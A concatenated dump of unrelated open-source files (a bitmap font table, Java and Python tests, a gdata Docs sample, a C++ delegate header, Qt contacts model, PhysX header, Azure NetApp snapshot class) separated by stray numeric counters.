0x60, 0x60, 0x60, 0x33, 0x1e, 0x00, 0x7c, 0x36, 0x33, 0x33, 0x33, 0x36, 0x7c, 0x00, 0x7f, 0x31, 0x34, 0x3c, 0x34, 0x31, 0x7f, 0x00, 0x7f, 0x31, 0x34, 0x3c, 0x34, 0x30, 0x78, 0x00, 0x1f, 0x33, 0x60, 0x60, 0x67, 0x33, 0x1f, 0x00, 0x66, 0x66, 0x66, 0x7e, 0x66, 0x66, 0x66, 0x00, 0x3c, 0x18, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x0f, 0x06, 0x06, 0x06, 0x66, 0x66, 0x3c, 0x00, 0x7b, 0x33, 0x36, 0x3c, 0x36, 0x33, 0x7b, 0x00, 0x78, 0x30, 0x30, 0x30, 0x31, 0x33, 0x7f, 0x00, 0x63, 0x77, 0x7f, 0x7f, 0x6b, 0x63, 0x63, 0x00, 0x63, 0x73, 0x7b, 0x6f, 0x67, 
0x63, 0x63, 0x00, 0x3e, 0x63, 0x63, 0x63, 0x63, 0x63, 0x3e, 0x00, 0x7e, 0x33, 0x33, 0x3e, 0x30, 0x30, 0x78, 0x00, 0x3c, 0x66, 0x66, 0x66, 0x66, 0x3c, 0x0f, 0x00, 0x7e, 0x33, 0x33, 0x3e, 0x3c, 0x36, 0x73, 0x00, 0x3c, 0x66, 0x60, 0x3c, 0x06, 0x66, 0x3c, 0x00, 0x7e, 0x5a, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x3c, 0x00, 0x66, 0x66, 0x66, 0x66, 0x66, 0x3c, 0x18, 0x00, 0x63, 0x63, 0x63, 0x6b, 0x7f, 0x77, 0x22, 0x00, 0x63, 0x63, 0x36, 0x1c, 0x36, 0x63, 0x63, 0x00, 0x66, 0x66, 0x66, 0x3c, 0x18, 0x18, 0x3c, 0x00, 0x7f, 0x63, 0x46, 0x0c, 0x19, 0x33, 0x7f, 0x00, 0x3c, 0x30, 0x30, 0x30, 0x30, 0x30, 0x3c, 0x00, 0x60, 0x30, 0x18, 0x0c, 0x06, 0x03, 0x01, 0x00, 0x3c, 0x0c, 0x0c, 0x0c, 0x0c, 0x0c, 0x3c, 0x00, 0x08, 0x1c, 0x36, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x18, 0x18, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3c, 0x06, 0x3e, 0x26, 0x3b, 0x00, 0x70, 0x30, 0x30, 0x3e, 0x33, 0x33, 0x3e, 0x00, 0x00, 0x00, 0x3c, 0x66, 0x60, 0x62, 0x3c, 0x00, 0x0e, 0x06, 0x06, 0x3e, 0x66, 0x66, 0x3e, 0x00, 0x00, 0x00, 0x3c, 0x66, 0x7e, 0x60, 0x3c, 0x00, 0x1c, 0x36, 0x30, 0x78, 0x30, 0x30, 0x78, 0x00, 0x00, 0x00, 0x3e, 0x66, 0x66, 0x3e, 0x06, 0x7c, 0x70, 0x30, 0x36, 0x3f, 0x33, 0x33, 0x73, 0x00, 0x18, 0x00, 0x38, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x06, 0x00, 0x06, 0x06, 0x06, 0x66, 0x66, 0x3c, 0x70, 0x30, 0x33, 0x36, 0x3c, 0x36, 0x73, 0x00, 0x38, 0x18, 0x18, 0x18, 0x18, 0x18, 0x3c, 0x00, 0x00, 0x00, 0x66, 0x7f, 0x6b, 0x6b, 0x63, 0x00, 0x00, 0x00, 0x7c, 0x7e, 0x66, 0x66, 0x66, 0x00, 0x00, 0x00, 0x3c, 0x66, 0x66, 0x66, 0x3c, 0x00, 0x00, 0x00, 0x7e, 0x33, 0x33, 0x3e, 0x30, 0x78, 0x00, 0x00, 0x3e, 0x66, 0x66, 0x3e, 0x06, 0x0f, 0x00, 0x00, 0x6f, 0x3b, 0x30, 0x30, 0x78, 0x00, 0x00, 0x00, 0x3e, 0x60, 0x3c, 0x06, 0x7c, 0x00, 0x18, 0x18, 0x7e, 0x18, 0x18, 0x1b, 0x0e, 0x00, 0x00, 0x00, 0x66, 0x66, 0x66, 0x66, 0x3b, 0x00, 0x00, 0x00, 0x66, 0x66, 0x66, 0x3c, 0x18, 0x00, 0x00, 0x00, 0x63, 0x63, 0x6b, 0x7f, 0x36, 0x00, 0x00, 0x00, 
0x63, 0x36, 0x1c, 0x36, 0x63, 0x00, 0x00, 0x00, 0xe6, 0x66, 0x66, 0x3e, 0x06, 0x7c, 0x00, 0x00, 0x7e, 0x4c, 0x18, 0x32, 0x7e, 0x00, 0x0e, 0x18, 0x18, 0x70, 0x18, 0x18, 0x0e, 0x00, 0x18, 0x18, 0x18, 0x00, 0x18, 0x18, 0x18, 0x00, 0x70, 0x18, 0x18, 0x0e, 0x18, 0x18, 0x70, 0x00, 0x31, 0x49, 0x46, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd8, 0x1c, 0x36, 0x63, 0x63, 0x7f, 0x00 };
4,855
10,225
package io.quarkus.it.keycloak;

import io.quarkus.test.junit.NativeImageTest;

/**
 * Re-runs the whole {@link BearerTokenAuthorizationTest} suite against the
 * application built as a native image; no additional test logic is needed,
 * the {@code @NativeImageTest} annotation selects the native execution mode.
 */
@NativeImageTest
public class BearerTokenAuthorizationInGraalITCase extends BearerTokenAuthorizationTest {
}
103
2,293
#!/usr/bin/python # # Copyright (C) 2007, 2009 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. __author__ = ('api.jfisher (<NAME>), ' 'e.bidelman (<NAME>)') import sys import re import os.path import getopt import getpass import gdata.docs.service import gdata.spreadsheet.service def truncate(content, length=15, suffix='...'): if len(content) <= length: return content else: return content[:length] + suffix class DocsSample(object): """A DocsSample object demonstrates the Document List feed.""" def __init__(self, email, password): """Constructor for the DocsSample object. Takes an email and password corresponding to a gmail account to demonstrate the functionality of the Document List feed. Args: email: [string] The e-mail address of the account to use for the sample. password: [string] The password corresponding to the account specified by the email parameter. Returns: A DocsSample object used to run the sample demonstrating the functionality of the Document List feed. """ source = 'Document List Python Sample' self.gd_client = gdata.docs.service.DocsService() self.gd_client.ClientLogin(email, password, source=source) # Setup a spreadsheets service for downloading spreadsheets self.gs_client = gdata.spreadsheet.service.SpreadsheetsService() self.gs_client.ClientLogin(email, password, source=source) def _PrintFeed(self, feed): """Prints out the contents of a feed to the console. Args: feed: A gdata.docs.DocumentListFeed instance. 
""" print '\n' if not feed.entry: print 'No entries in feed.\n' print '%-18s %-12s %s' % ('TITLE', 'TYPE', 'RESOURCE ID') for entry in feed.entry: print '%-18s %-12s %s' % (truncate(entry.title.text.encode('UTF-8')), entry.GetDocumentType(), entry.resourceId.text) def _GetFileExtension(self, file_name): """Returns the uppercase file extension for a file. Args: file_name: [string] The basename of a filename. Returns: A string containing the file extension of the file. """ match = re.search('.*\.([a-zA-Z]{3,}$)', file_name) if match: return match.group(1).upper() return False def _UploadMenu(self): """Prompts that enable a user to upload a file to the Document List feed.""" file_path = '' file_path = raw_input('Enter path to file: ') if not file_path: return elif not os.path.isfile(file_path): print 'Not a valid file.' return file_name = os.path.basename(file_path) ext = self._GetFileExtension(file_name) if not ext or ext not in gdata.docs.service.SUPPORTED_FILETYPES: print 'File type not supported. Check the file extension.' return else: content_type = gdata.docs.service.SUPPORTED_FILETYPES[ext] title = '' while not title: title = raw_input('Enter name for document: ') try: ms = gdata.MediaSource(file_path=file_path, content_type=content_type) except IOError: print 'Problems reading file. Check permissions.' return if ext in ['CSV', 'ODS', 'XLS', 'XLSX']: print 'Uploading spreadsheet...' elif ext in ['PPT', 'PPS']: print 'Uploading presentation...' else: print 'Uploading word processor document...' entry = self.gd_client.Upload(ms, title) if entry: print 'Upload successful!' print 'Document now accessible at:', entry.GetAlternateLink().href else: print 'Upload error.' 
def _DownloadMenu(self): """Prompts that enable a user to download a local copy of a document.""" resource_id = '' resource_id = raw_input('Enter an resource id: ') file_path = '' file_path = raw_input('Save file to: ') if not file_path or not resource_id: return file_name = os.path.basename(file_path) ext = self._GetFileExtension(file_name) if not ext or ext not in gdata.docs.service.SUPPORTED_FILETYPES: print 'File type not supported. Check the file extension.' return else: content_type = gdata.docs.service.SUPPORTED_FILETYPES[ext] doc_type = resource_id[:resource_id.find(':')] # When downloading a spreadsheet, the authenticated request needs to be # sent with the spreadsheet service's auth token. if doc_type == 'spreadsheet': print 'Downloading spreadsheet to %s...' % (file_path,) docs_token = self.gd_client.GetClientLoginToken() self.gd_client.SetClientLoginToken(self.gs_client.GetClientLoginToken()) self.gd_client.Export(resource_id, file_path, gid=0) self.gd_client.SetClientLoginToken(docs_token) else: print 'Downloading document to %s...' 
% (file_path,) self.gd_client.Export(resource_id, file_path) def _ListDocuments(self): """Retrieves and displays a list of documents based on the user's choice.""" print 'Retrieve (all/document/folder/presentation/spreadsheet/pdf): ' category = raw_input('Enter a category: ') if category == 'all': feed = self.gd_client.GetDocumentListFeed() elif category == 'folder': query = gdata.docs.service.DocumentQuery(categories=['folder'], params={'showfolders': 'true'}) feed = self.gd_client.Query(query.ToUri()) else: query = gdata.docs.service.DocumentQuery(categories=[category]) feed = self.gd_client.Query(query.ToUri()) self._PrintFeed(feed) def _ListAclPermissions(self): """Retrieves a list of a user's folders and displays them.""" resource_id = raw_input('Enter an resource id: ') query = gdata.docs.service.DocumentAclQuery(resource_id) print '\nListing document permissions:' feed = self.gd_client.GetDocumentListAclFeed(query.ToUri()) for acl_entry in feed.entry: print '%s - %s (%s)' % (acl_entry.role.value, acl_entry.scope.value, acl_entry.scope.type) def _ModifyAclPermissions(self): """Create or updates the ACL entry on an existing document.""" resource_id = raw_input('Enter an resource id: ') email = raw_input('Enter an email address: ') role_value = raw_input('Enter a permission (reader/writer/owner/remove): ') uri = gdata.docs.service.DocumentAclQuery(resource_id).ToUri() acl_feed = self.gd_client.GetDocumentListAclFeed(uri) found_acl_entry = None for acl_entry in acl_feed.entry: if acl_entry.scope.value == email: found_acl_entry = acl_entry break if found_acl_entry: if role_value == 'remove': # delete ACL entry self.gd_client.Delete(found_acl_entry.GetEditLink().href) else: # update ACL entry found_acl_entry.role.value = role_value updated_entry = self.gd_client.Put( found_acl_entry, found_acl_entry.GetEditLink().href, converter=gdata.docs.DocumentListAclEntryFromString) else: scope = gdata.docs.Scope(value=email, type='user') role = 
gdata.docs.Role(value=role_value) acl_entry = gdata.docs.DocumentListAclEntry(scope=scope, role=role) inserted_entry = self.gd_client.Post( acl_entry, uri, converter=gdata.docs.DocumentListAclEntryFromString) print '\nListing document permissions:' acl_feed = self.gd_client.GetDocumentListAclFeed(uri) for acl_entry in acl_feed.entry: print '%s - %s (%s)' % (acl_entry.role.value, acl_entry.scope.value, acl_entry.scope.type) def _FullTextSearch(self): """Searches a user's documents for a text string. Provides prompts to search a user's documents and displays the results of such a search. The text_query parameter of the DocumentListQuery object corresponds to the contents of the q parameter in the feed. Note that this parameter searches the content of documents, not just their titles. """ input = raw_input('Enter search term: ') query = gdata.docs.service.DocumentQuery(text_query=input) feed = self.gd_client.Query(query.ToUri()) self._PrintFeed(feed) def _PrintMenu(self): """Displays a menu of options for the user to choose from.""" print ('\nDocument List Sample\n' '1) List your documents.\n' '2) Search your documents.\n' '3) Upload a document.\n' '4) Download a document.\n' "5) List a document's permissions.\n" "6) Add/change a document's permissions.\n" '7) Exit.\n') def _GetMenuChoice(self, max): """Retrieves the menu selection from the user. Args: max: [int] The maximum number of allowed choices (inclusive) Returns: The integer of the menu item chosen by the user. """ while True: input = raw_input('> ') try: num = int(input) except ValueError: print 'Invalid choice. Please choose a value between 1 and', max continue if num > max or num < 1: print 'Invalid choice. 
Please choose a value between 1 and', max else: return num def Run(self): """Prompts the user to choose funtionality to be demonstrated.""" try: while True: self._PrintMenu() choice = self._GetMenuChoice(7) if choice == 1: self._ListDocuments() elif choice == 2: self._FullTextSearch() elif choice == 3: self._UploadMenu() elif choice == 4: self._DownloadMenu() elif choice == 5: self._ListAclPermissions() elif choice == 6: self._ModifyAclPermissions() elif choice == 7: print '\nGoodbye.' return except KeyboardInterrupt: print '\nGoodbye.' return def main(): """Demonstrates use of the Docs extension using the DocsSample object.""" # Parse command line options try: opts, args = getopt.getopt(sys.argv[1:], '', ['user=', 'pw=']) except getopt.error, msg: print 'python docs_example.py --user [username] --pw [password] ' sys.exit(2) user = '' pw = '' key = '' # Process options for option, arg in opts: if option == '--user': user = arg elif option == '--pw': pw = arg while not user: print 'NOTE: Please run these tests only with a test account.' user = raw_input('Please enter your username: ') while not pw: pw = getpass.getpass() if not pw: print 'Password cannot be blank.' try: sample = DocsSample(user, pw) except gdata.service.BadAuthentication: print 'Invalid user credentials given.' return sample.Run() if __name__ == '__main__': main()
4,338
348
<filename>docs/data/leg-t2/040/04002181.json {"nom":"Messanges","circ":"2ème circonscription","dpt":"Landes","inscrits":853,"abs":369,"votants":484,"blancs":20,"nuls":9,"exp":455,"res":[{"nuance":"REM","nom":"<NAME>","voix":318},{"nuance":"FI","nom":"<NAME>","voix":137}]}
108
977
<filename>Sources/Utils/Delegate.hpp #pragma once #include <algorithm> #include <functional> #include <memory> #include <mutex> #include "ConstExpr.hpp" #include "NonCopyable.hpp" namespace acid { template<typename> class Delegate; class ACID_EXPORT Observer { public: Observer() : valid(std::make_shared<bool>(true)) { } virtual ~Observer() = default; std::shared_ptr<bool> valid; }; template<typename TReturnType, typename ...TArgs> class Invoker { public: using ReturnType = std::vector<TReturnType>; static ReturnType Invoke(Delegate<TReturnType(TArgs ...)> &delegate, TArgs ... params) { std::lock_guard<std::mutex> lock(delegate.mutex); ReturnType returnValues; for (auto it = delegate.functions.begin(); it != delegate.functions.end();) { if (it->IsExpired()) { it = delegate.functions.erase(it); continue; } returnValues.emplace_back((*it->function)(params...)); ++it; } return returnValues; } }; template<typename... TArgs> class Invoker<void, TArgs...> { public: using ReturnType = void; static void Invoke(Delegate<void(TArgs ...)> &delegate, TArgs ... 
params) { std::lock_guard<std::mutex> lock(delegate.mutex); if (delegate.functions.empty()) { return; } for (auto it = delegate.functions.begin(); it != delegate.functions.end();) { if (it->IsExpired()) { it = delegate.functions.erase(it); continue; } it->function(params...); ++it; } } }; template<typename TReturnType, typename ...TArgs> class Delegate<TReturnType(TArgs ...)> { public: using Invoker = acid::Invoker<TReturnType, TArgs...>; using FunctionType = std::function<TReturnType(TArgs ...)>; using ObserversType = std::vector<std::weak_ptr<bool>>; class FunctionPair { public: bool IsExpired() { for (const auto &observer : observers) { if (observer.expired()) { return true; } } return false; } FunctionType function; ObserversType observers; }; Delegate() = default; virtual ~Delegate() = default; template<typename ...KArgs> void Add(FunctionType &&function, KArgs ...args) { std::lock_guard<std::mutex> lock(mutex); ObserversType observers; if constexpr (sizeof...(args) != 0) { for (const auto &arg : {args...}) { observers.emplace_back(to_address(arg)->valid); } } functions.emplace_back(FunctionPair{std::move(function), observers}); } void Remove(const FunctionType &function) { std::lock_guard<std::mutex> lock(mutex); functions.erase(std::remove_if(functions.begin(), functions.end(), [function](FunctionPair &f) { return Hash(f.function) == Hash(function); }), functions.end()); } template<typename ...KArgs> void RemoveObservers(KArgs ...args) { ObserversType removes; if constexpr (sizeof...(args) != 0) { for (const auto &arg : {args...}) { removes.emplace_back(to_address(arg)->valid); } } for (auto it = functions.begin(); it != functions.end();) { for (auto it1 = it->observers.begin(); it1 != it->observers.end();) { bool erase = false; auto opt = it1->lock(); for (const auto &remove : removes) { auto ept = remove.lock(); if (opt.get() == ept.get()) erase = true; } if (erase) it1 = it->observers.erase(it1); else ++it1; } if (it->observers.empty()) it = 
functions.erase(it); else ++it; } } void MoveFunctions(Delegate &from, const ObserversType &exclude = {}) { for (auto it = from.functions.begin(); it < from.functions.end();) { bool move = true; for (const auto &excluded : exclude) { auto ept = excluded.lock(); for (const auto &observer : it->observers) { auto opt = observer.lock(); if (opt.get() == ept.get()) move = false; } } if (move) { std::move(from.functions.begin(), it, std::back_inserter(functions)); it = from.functions.erase(from.functions.begin(), it); } else { ++it; } } } void Clear() { std::lock_guard<std::mutex> lock(mutex); functions.clear(); } typename Invoker::ReturnType Invoke(TArgs ... args) { return Invoker::Invoke(*this, args...); } Delegate &operator+=(FunctionType &&function) { return Add(std::move(function)); } Delegate &operator-=(const FunctionType function) { return Remove(function); } typename Invoker::ReturnType operator()(TArgs ... args) { return Invoker::Invoke(*this, args...); } private: friend Invoker; static constexpr size_t Hash(const FunctionType &function) { return function.target_type().hash_code(); } std::mutex mutex; std::vector<FunctionPair> functions; }; template<typename T> class DelegateValue : public Delegate<void(T)>, NonCopyable { public: template<typename ...Args> DelegateValue(Args ...args) : value(std::forward<Args>(args)...) { } virtual ~DelegateValue() = default; DelegateValue &operator=(T value) { this->value = value; Invoke(this->value); return *this; } /** * Access the stored value. * @return The value. */ operator const T &() const noexcept { return value; } const T &get() const { return value; } const T &operator*() const { return value; } const T *operator->() const { return &value; } protected: T value; }; }
2,056
811
from recipe_scrapers.headbangerskitchen import HeadbangersKitchen from tests import ScraperTest class TestHeadbangersKitchenScraper(ScraperTest): scraper_class = HeadbangersKitchen def test_host(self): self.assertEqual("headbangerskitchen.com", self.harvester_class.host()) # def test_canonical_url(self): # self.assertEqual( # 'https://headbangerskitchen.com/recipe/keto-omelet-indian-style/', # self.harvester_class.canonical_url(), # ) def test_author(self): self.assertEqual("<NAME>", self.harvester_class.author()) def test_title(self): self.assertEqual("Keto Omelet (Indian Style)", self.harvester_class.title()) def test_total_time(self): self.assertEqual(10, self.harvester_class.total_time()) def test_yields(self): self.assertEqual("1 serving(s)", self.harvester_class.yields()) def test_image(self): self.assertEqual( "https://headbangerskitchen.com/wp-content/uploads/2020/11/KETOMASALAOMELET-Vertical.jpg", self.harvester_class.image(), ) def test_ingredients(self): self.assertEqual( [ "3 Eggs", "20 grams Cheese", "20 grams Red onion", "1 Tbsp Heavy Whipping Cream ( Order online )", "1/2 Tsp Tumeric ( Order online )", "1/2 Tsp Kashmiri Red Chilli Powder ( Order online )", "1 Tbsp Ghee", "salt and pepper to taste", "1 Tsp Coriander", ], self.harvester_class.ingredients(), ) def test_instructions(self): self.assertEqual( "Crack the 3 eggs into a bowl and add in the chopped onion, coriander, salt, pepper, tumeric, chilli powder and heavy cream and beat well.\nHeat the ghee in a frying pan and once melted add in the beaten eggs. Grate in the cheese and cover and cook for about 4 minutes. Fold the egg and finish cooking.\nServe with a side of salad.", self.harvester_class.instructions(), ) def test_ratings(self): self.assertEqual(4.33, self.harvester_class.ratings())
984
3,461
<filename>src/ui/ContactsModel.cpp /* Ricochet - https://ricochet.im/ * Copyright (C) 2014, <NAME> <<EMAIL>> * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * * Neither the names of the copyright owners nor the names of its * contributors may be used to endorse or promote products derived from * this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ #include "ContactsModel.h" #include "core/IdentityManager.h" #include "core/ContactsManager.h" #include <QDebug> inline bool contactSort(const ContactUser *c1, const ContactUser *c2) { if (c1->status() != c2->status()) return c1->status() < c2->status(); return c1->nickname().localeAwareCompare(c2->nickname()) < 0; } ContactsModel::ContactsModel(QObject *parent) : QAbstractListModel(parent), m_identity(0) { } void ContactsModel::setIdentity(UserIdentity *identity) { if (identity == m_identity) return; beginResetModel(); foreach (ContactUser *user, contacts) user->disconnect(this); contacts.clear(); if (m_identity) { disconnect(m_identity, 0, this, 0); disconnect(&m_identity->contacts, 0, this, 0); } m_identity = identity; if (m_identity) { connect(&identity->contacts, SIGNAL(contactAdded(ContactUser*)), SLOT(contactAdded(ContactUser*))); contacts = identity->contacts.contacts(); std::sort(contacts.begin(), contacts.end(), contactSort); foreach (ContactUser *user, contacts) connectSignals(user); } endResetModel(); emit identityChanged(); } QModelIndex ContactsModel::indexOfContact(ContactUser *user) const { int row = contacts.indexOf(user); if (row < 0) return QModelIndex(); return index(row, 0); } ContactUser *ContactsModel::contact(int row) const { return contacts.value(row); } void ContactsModel::updateUser(ContactUser *user) { if (!user) { user = qobject_cast<ContactUser*>(sender()); if (!user) return; } int row = contacts.indexOf(user); if (row < 0) { user->disconnect(this); return; } QList<ContactUser*> sorted = contacts; std::sort(sorted.begin(), sorted.end(), contactSort); int newRow = sorted.indexOf(user); if (row != newRow) { beginMoveRows(QModelIndex(), row, row, QModelIndex(), (newRow > row) ? 
(newRow+1) : newRow); contacts = sorted; endMoveRows(); } emit dataChanged(index(newRow, 0), index(newRow, 0)); } void ContactsModel::connectSignals(ContactUser *user) { connect(user, SIGNAL(statusChanged()), SLOT(updateUser())); connect(user, SIGNAL(nicknameChanged()), SLOT(updateUser())); connect(user, SIGNAL(contactDeleted(ContactUser*)), SLOT(contactRemoved(ContactUser*))); } void ContactsModel::contactAdded(ContactUser *user) { Q_ASSERT(!indexOfContact(user).isValid()); connectSignals(user); QList<ContactUser*>::Iterator lp = qLowerBound(contacts.begin(), contacts.end(), user, contactSort); int row = lp - contacts.begin(); beginInsertRows(QModelIndex(), row, row); contacts.insert(lp, user); endInsertRows(); } void ContactsModel::contactRemoved(ContactUser *user) { if (!user && !(user = qobject_cast<ContactUser*>(sender()))) return; int row = contacts.indexOf(user); beginRemoveRows(QModelIndex(), row, row); contacts.removeAt(row); endRemoveRows(); disconnect(user, 0, this, 0); } QHash<int,QByteArray> ContactsModel::roleNames() const { QHash<int, QByteArray> roles; roles[Qt::DisplayRole] = "name"; roles[PointerRole] = "contact"; roles[StatusRole] = "status"; return roles; } int ContactsModel::rowCount(const QModelIndex &parent) const { if (parent.isValid()) return 0; return contacts.size(); } QVariant ContactsModel::data(const QModelIndex &index, int role) const { if (!index.isValid() || index.row() >= contacts.size()) return QVariant(); ContactUser *user = contacts[index.row()]; switch (role) { case Qt::DisplayRole: case Qt::EditRole: return user->nickname(); case PointerRole: return QVariant::fromValue(user); case StatusRole: return user->status(); } return QVariant(); }
2,045
1,863
<reponame>gongyiling/PhysX-3.4 // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions // are met: // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // * Neither the name of NVIDIA CORPORATION nor the names of its // contributors may be used to endorse or promote products derived // from this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY // EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR // PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, // EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, // PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR // PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY // OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT // (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE // OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // // Copyright (c) 2018 NVIDIA Corporation. All rights reserved. #include "RTdef.h" #if RT_COMPILE /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /** * Contains code for box pruning. 
* \file IceBoxPruning.h * \author <NAME> * \date January, 29, 2000 */ /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // Include Guard #ifndef __ICEBOXPRUNING_BASE_H__ #define __ICEBOXPRUNING_BASE_H__ //#include "vector" #include <PsArray.h> #include "IceRevisitedRadixBase.h" #include "PxVec3.h" #include "PxBounds3.h" #include <PsUserAllocated.h> namespace nvidia { namespace fracture { namespace base { struct Axes { void set(uint32_t a0, uint32_t a1, uint32_t a2) { Axis0 = a0; Axis1 = a1; Axis2 = a2; } uint32_t Axis0; uint32_t Axis1; uint32_t Axis2; }; class BoxPruning : public UserAllocated { public: // Optimized versions bool completeBoxPruning(const nvidia::Array<PxBounds3> &bounds, nvidia::Array<uint32_t> &pairs, const Axes& axes); bool bipartiteBoxPruning(const nvidia::Array<PxBounds3> &bounds0, const nvidia::Array<PxBounds3> &bounds1, nvidia::Array<uint32_t>& pairs, const Axes& axes); // Brute-force versions bool bruteForceCompleteBoxTest(const nvidia::Array<PxBounds3> &bounds, nvidia::Array<uint32_t> &pairs, const Axes& axes); bool bruteForceBipartiteBoxTest(const nvidia::Array<PxBounds3> &bounds0, const nvidia::Array<PxBounds3> &bounds1, nvidia::Array<uint32_t>& pairs, const Axes& axes); protected: nvidia::Array<float> mMinPosBounds0; nvidia::Array<float> mMinPosBounds1; nvidia::Array<float> mPosList; RadixSort mRS0, mRS1; RadixSort mRS; }; } } } #endif // __ICEBOXPRUNING_H__ #endif
1,128
1,350
// Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License. // Code generated by Microsoft (R) AutoRest Code Generator. package com.azure.resourcemanager.netapp.implementation; import com.azure.core.management.Region; import com.azure.core.util.Context; import com.azure.resourcemanager.netapp.fluent.models.SnapshotInner; import com.azure.resourcemanager.netapp.models.Snapshot; import java.time.OffsetDateTime; public final class SnapshotImpl implements Snapshot, Snapshot.Definition { private SnapshotInner innerObject; private final com.azure.resourcemanager.netapp.NetAppFilesManager serviceManager; SnapshotImpl(SnapshotInner innerObject, com.azure.resourcemanager.netapp.NetAppFilesManager serviceManager) { this.innerObject = innerObject; this.serviceManager = serviceManager; } public String id() { return this.innerModel().id(); } public String name() { return this.innerModel().name(); } public String type() { return this.innerModel().type(); } public String location() { return this.innerModel().location(); } public String snapshotId() { return this.innerModel().snapshotId(); } public OffsetDateTime created() { return this.innerModel().created(); } public String provisioningState() { return this.innerModel().provisioningState(); } public Region region() { return Region.fromName(this.regionName()); } public String regionName() { return this.location(); } public SnapshotInner innerModel() { return this.innerObject; } private com.azure.resourcemanager.netapp.NetAppFilesManager manager() { return this.serviceManager; } private String resourceGroupName; private String accountName; private String poolName; private String volumeName; private String snapshotName; public SnapshotImpl withExistingVolume( String resourceGroupName, String accountName, String poolName, String volumeName) { this.resourceGroupName = resourceGroupName; this.accountName = accountName; this.poolName = poolName; this.volumeName = volumeName; return this; } public 
Snapshot create() { this.innerObject = serviceManager .serviceClient() .getSnapshots() .create( resourceGroupName, accountName, poolName, volumeName, snapshotName, this.innerModel(), Context.NONE); return this; } public Snapshot create(Context context) { this.innerObject = serviceManager .serviceClient() .getSnapshots() .create(resourceGroupName, accountName, poolName, volumeName, snapshotName, this.innerModel(), context); return this; } SnapshotImpl(String name, com.azure.resourcemanager.netapp.NetAppFilesManager serviceManager) { this.innerObject = new SnapshotInner(); this.serviceManager = serviceManager; this.snapshotName = name; } public Snapshot refresh() { this.innerObject = serviceManager .serviceClient() .getSnapshots() .getWithResponse(resourceGroupName, accountName, poolName, volumeName, snapshotName, Context.NONE) .getValue(); return this; } public Snapshot refresh(Context context) { this.innerObject = serviceManager .serviceClient() .getSnapshots() .getWithResponse(resourceGroupName, accountName, poolName, volumeName, snapshotName, context) .getValue(); return this; } public SnapshotImpl withRegion(Region location) { this.innerModel().withLocation(location.toString()); return this; } public SnapshotImpl withRegion(String location) { this.innerModel().withLocation(location); return this; } }
1,696
5,519
